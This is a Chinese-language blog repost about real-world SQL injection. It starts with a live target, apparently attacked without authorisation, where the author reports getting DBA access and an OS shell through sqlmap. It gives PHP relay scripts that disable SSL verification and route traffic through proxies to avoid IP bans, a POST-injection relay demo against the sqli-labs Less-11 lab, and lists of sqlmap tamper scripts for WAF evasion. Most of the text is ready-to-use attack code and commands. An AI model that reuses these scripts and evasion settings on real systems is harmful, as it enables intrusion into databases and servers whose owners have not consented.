原文:https://xz.aliyun.com/t/10385,底下有评论很重要:

前言

随着最近几年安全行业的兴起,市场关注度的不断提升,安全防护的软件也在不断提升,不在是那个随便找一个站就能马上发现漏洞了,没有以前那么多所谓的“靶场”了,在这次的实战中遇到的SQL注入与其他的有点不一样,需要考虑的东西很多,写得不好的地方师傅们勿喷。

实战演示

通过前期的信息收集发现存在注入的页面如下:

直接使用sqlmap跑发现出现如下错误:

python2 sqlmap.py -u "http://xxxx?&daxxtae=null&parame=xxxxxx" --batch --delay=1 --random-agent_____H_____ ___["]_____ ___ ___  {1.5.4.7#dev}
|_ -| . [)]     | .'| . |
|___|_  ["]_|_|_|__,|  _||_|V...       |_|   http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 10:12:10 /2021-10-10/
[10.12.10] [INFO] parsing HTTP request from '49'
custom injection marking character ('*') found in option '--data'. Do you want to process it?  [Y/n/q]Y
[10:12:10] [INFO] testing connection to the target URL
[10:12:10] [CRITICAL] can't establish SSL connection

一看无法建立SSL连接,好不容易发现一个注入点,难道就这样放弃了吗?先百度一波,看看SSL证书原理,就用一张图来理解更直接明了。

那么遇到这样的情况要怎么绕呢?在sqlmap中没有绕过SSL证书的参数,
(先知原文章底下的评论有讲到另外一种方法:可以试试内置参数–force-ssl)
思考了很长时间,终于想起来原来貌似有一个中转注入。这里要解决的第一个问题是有哪些脚本语言能够在请求网址时忽略SSL证书,第二个问题是我还需要使用sqlmap中的payload,这两个都要满足,通过查询了解到PHP可以使用参数来忽略SSL证书,由于并不是搞开发的,所以这里还是思考了很长时间,先来理解一下中转注入的原理吧。

中转注入的原理

首先我们我们来分析一下sqlmap中转注入的原理,如下图:

为了让大家更加容易解,先使用简单的脚本演示一遍,演示代码如下:

<?php
$payload=base64_encode($_GET['x']);//对中转脚本接收的参数进行base64编码
echo $payload
$urls="http://xxx/xxxx?q=1$payload";//对请求的网址拼接base64编码的字符串
file_get_contents($urls);//请求目标网站
echo $urls;
?>

网上随便找需一个后面有参数的网站,添加到$urls变量中,将上述代码放在本地服务器中,然后访问,可以看到成功请求到我们添加的网站

使用sqlmap跑一下,设置一下代理使用burp来抓包

python2 sqlmap.py -u "http://127.0.0.1/zhongzhuan.php?x=1"  -v 3 --proxy=http://127.0.0.1:8080

成功看到各种payload


burp抓包的结果

<?php
set_time_limit(0);
$id=$_GET["id"];
$id=str_replace(" ","/**/",$id);
$id=str_replace("=","%3D",$id); //这些编码机制可以自己的需求设定,毕竟实战的环境变换多样
$url = "http://xxxx?&daxxtae=null&parame=$id";
echo $url;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$url");
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); // https请求 不验证证书
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);//https请求 不验证hosts
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); // 函数执行如果成功只将结果返回,不自动输出任何内容。如果失败返回FALSE
curl_setopt($ch, CURLOPT_HEADER, 0);//如果你想把一个头包含在输出中,设置这个选项为一个非零值
$output = curl_exec($ch);
curl_close($ch);
print_r($output);
?>

此时中转脚本已经写好了,用sqlmap跑,没想到呀,既然流量有限制,就算请求延迟调得很慢,还是直接将我的ip给封了,此时又是一个漫长的过程,又要继续思考了,在sqlmap中有代理设置参数,哈哈哈这都知道,但是试了试一试不可以,一直思考呀,首先我们借助了中转脚本,先请求的是我们的本地服务器,你说外网的代理服务器直接访问我本地服务器这是一个不现实的问题,最主要是我没有公网服务器,不然就好办了,所以现在需要思考两个问题,首先我要用到中转脚本过证书问题,还要能够使用代理,在PHP代码上使用代理池设置。此时sqlmap先请求我们中转脚本(并没有用代理地址),中转脚本借助设置的代理地址迟访问目标网页。
现在代码修改成了如下:

<?php
set_time_limit(0);
$id=$_GET["id"];
$id=str_replace(" ","%20",$id);
$id=str_replace("=","%3D",$id);
$url = "http://xxxx?&daxxtae=null&parame=$id";
echo $url;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$url");
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_PROXY, 'proxy.xxxx.com'); //代理服务器地址
curl_setopt($ch, CURLOPT_PROXYPORT, '8080'); //代理服务器端口
$output = curl_exec($ch);
curl_close($ch);
print_r($output);
?>

在使用sqlmap跑的时候最好先本地测试一下,经过了20多分钟的扫描终于算是出东西了

直接看一下能否写shell,搞个高危,运气就是这么好

python2 sqlmap.py -u "http://xxxx?&daxxtae=null&param=xxx" --batch --delay=1 --random-agent --os-shell

成功拿到了dba权限

成功执行命令,不过是真的慢,可能是有防护软件原因吧。

在这里问题又来了,要是post型注入又该怎么办呢?上面的脚本似乎不在使用思考了很长时间,但是也没有在实际中遇到,所以这里就想本地尝试一次。

post型中转注入

在注入天书中有post型注入,随便选了一个11关卡,抓取less-11关的包,注入点在登录框这里。

注入点为

uname=admin&passwd=hhh&submit=Submit

构造中转脚本如下:

<?php
$url = "http://192.168.1.104/sqli/Less-11/index.php";
$sql = $_GET[s];//获取中转脚本传过来的payload
$s = urlencode($sql);
$params = "uname=admin$s&passwd=aa";
$ch = curl_init();// 创建一个新cURL资源curl_setopt($ch, CURLOPT_URL, $url);//这是你想用PHP取回的URL地址,可以在用curl_init()函数初始化时设置这个选项
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); // https请求 不验证证书
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);//https请求 不验证hosts
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); // 函数执行如果成功只将结果返回,不自动输出任何内容。如果失败返回FALSE
curl_setopt($ch, CURLOPT_HEADER, 0);//如果你想把一个头包含在输出中,设置这个选项为一个非零值
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (compatible; MSIE 5.01; Windows NT 5.0)');// 在HTTP请求中自定义一个”user-agent”头的字符串
curl_setopt($ch, CURLOPT_TIMEOUT, 15);//为了应对目标服务器的过载,下线,或者崩溃等可能状况。
curl_setopt($ch, CURLOPT_POST, 1);    // post 提交方式
curl_setopt($ch, CURLOPT_POSTFIELDS, $params);
// 抓取URL并把它传递给浏览器
$output = curl_exec($ch);
// 关闭cURL资源,并且释放系统资源
curl_close($ch);
$a = strlen($output);
//echo $a;
if($a==2846){echo "1";
}else{echo "2";
}

使用sqlmap进行注入

首先注入我们的中转脚本

中转脚本通过获取的payload请求目标网站

成功跑出数据库

sqlmap绕过WAF的思路总结

1、设置请求头

--user-agent="Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0"

2、设置代理

--proxy=http://127.0.0.1:8080

3、设置延迟

--delay=1

4、利用--tamper参数中的编码脚本
常见编码搭配方式
普通tamper搭配方式:

tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes

数据库为MSSQL的搭配方式:

tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes

数据库为MySql的搭配方式:

tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor

5、自己编写中转脚本

        </div>

实战sqlmap绕过WAF(中转注入)相关推荐

  1. 【Web安全】实战sqlmap绕过WAF

    前言 随着最近几年安全行业的兴起,市场关注度的不断提升,安全防护的软件也在不断提升,不在是那个随便找一个站就能马上发现漏洞了,没有以前那么多所谓的"靶场"了,在这次的实战中遇到的S ...

  2. 实战sqlmap绕过WAF

    本文转载于https://xz.aliyun.com/t/10385 实战演示 通过前期的信息收集发现存在注入的页面如下: 直接使用sqlmap跑发现出现如下错误: python2 sqlmap.py ...

  3. 渗透测试-sqlmap绕过WAF脚本编写

    sqlmap绕过WAF脚本编写 文章目录 sqlmap绕过WAF脚本编写 前言 一.什么是sqlmap和tamper脚本 二.利用sqlmap脚本进行扫描获取数据库信息 1.编写sqlmap绕过WAF ...

  4. 使用sqlmap 绕过防火墙进行注入测试

    0x00 前言 现在的网络环境往往是WAF/IPS/IDS保护着Web 服务器等等,这种保护措施往往会过滤挡住我们的SQL注入查询链接,甚至封锁我们的主机IP,所以这个时候,我们就要考虑怎样进行绕过, ...

  5. mysql绕过防火墙_[转载]使用sqlmap 绕过防火墙进行注入测试

    0x00 前言 现在的网络环境往往是WAF/IPS/IDS保护着Web 服务器等等,这种保护措施往往会过滤挡住我们的SQL注入查询链接,甚至封锁我们的主机IP,所以这个时候,我们就要考虑怎样进行绕过, ...

  6. 实战|简单绕过waf拿下赌博网站

    确定目标 收集信息 x.x.x.x 首先常规测试方法一顿怼,目录扫描,端口扫描,js文件,中间件,指纹识别,反正该上的都上... 随手加个路径,报错了,当看到这个界面我瞬间就有思路了 为什么这么说呢, ...

  7. 第19篇:WEB漏洞~SQL注入~SqlMap绕过WAF

    目录 1. 本文 2. 示例 2.1. 简要其他绕过方式学习 2.1.1. IP 白名单 2.1.2. 静态资源 2.1.3. url 白名单 2.1.4. 爬虫白名单 2.2. FUZZ绕过脚本结合 ...

  8. B站小迪安全笔记第十九天-SQL注入之sqlmap绕过waf

    前言: 在攻防实战中,往往需要掌握一些特性,比如服务器.数据库.应用层.WAF层等,以便我们更灵活地去构造 Payload,从而可以和各种 WAF 进行对抗,甚至绕过安全防御措施进行漏洞利用. 演示案 ...

  9. mysql 注入关键字waf_利用mysql的隐式类型转换绕过waf注入

    今天做的一道ctf题,要求绕过waf去注入,可以通过mysql隐式类型转换的特性去绕过waf,在这里记录下来供大家学习一下 题目地址:题目地址(比赛结束后可能会失效) HINT:我都过滤了,看你怎么绕 ...

  10. 记一次针对SupeSite的中转注入实战

    近期在一次演练行动中,对某目标进行了一次渗透测试,期间用到了sqlmap的中转注入技术,还是很有收获的,记录下来和大家共同分享,由于是实战,免不了部分地方是要马赛克的,大家见谅. 免责声明:本文中提到 ...

最新文章

  1. NSString字符串常用知识点
  2. jsp页面,在浏览器端显示时会出现乱码解决方法
  3. 街机linux有安卓好吗,Ubuntu下用xmame玩街机游戏
  4. 用Java和ffmpeg把音频和视频合成视频
  5. mysql更改安装路径6_关于mysql安装后更改数据库路径方法-Centos6环境
  6. Linus Torvalds 回应,Debian 项目曾讨论永久禁止他出席会议!
  7. Flutter开发 Android Studio 安装第三方模拟器—网易MuMu
  8. python 趋势跟踪算法_DualThrust区间突破策略Python版
  9. AOP核心概念,连接点(JoinPoint)切入点(Pointcut)通知(Advice)通知类切面(Aspect)
  10. Grid-based RRP/基于网格的路径重新规划问题
  11. MYSQL排序加分页报错Out of sort memory, consider increasing server sort buffer size
  12. iPhone又爆Wi-Fi漏洞 中招Wi-Fi就废了
  13. Grand Central Dispatch 基础教程:Part 1/2
  14. 退出计算机用户的快捷方式,如何注销计算机或从Windows 10注销
  15. (亲测可用)html5 file调用手机摄像头
  16. ArcGIS合并shp文件及单个shp文件中的相邻斑块
  17. 2022年Redis最新面试题 - Redis缓存问题
  18. 【华为OD机试真题 Python】乱序整数序列之两数之和绝对值最小
  19. 全国私营企业调查数据(CPES1993-2014)
  20. 对PTP 1588新的认识

热门文章

  1. 《中国人史纲》读书笔记:第六、七章 纪元前八、七世纪
  2. 异常检测论文阅读《Anomaly Detection in Video Sequences: A Benchmark and Computational Model》
  3. 支付宝"手机网站支付"主域名申请了,二级域名还要申请吗
  4. No fallbackFactory instance of type class 问题处理
  5. 今日头条安卓_考察今日头条总部—字节跳动
  6. [bzoj3202][SDOI2013]项链
  7. poco mysql 编译_Poco介绍及编译
  8. 某Java大佬在地表最强Java企业(阿里)面试总结
  9. 笔记本电脑总是锁定计算机呢,笔记本电脑键盘锁定了怎么办有什么方法解锁
  10. 利用Python爬取公交地铁数据(TransBigData版)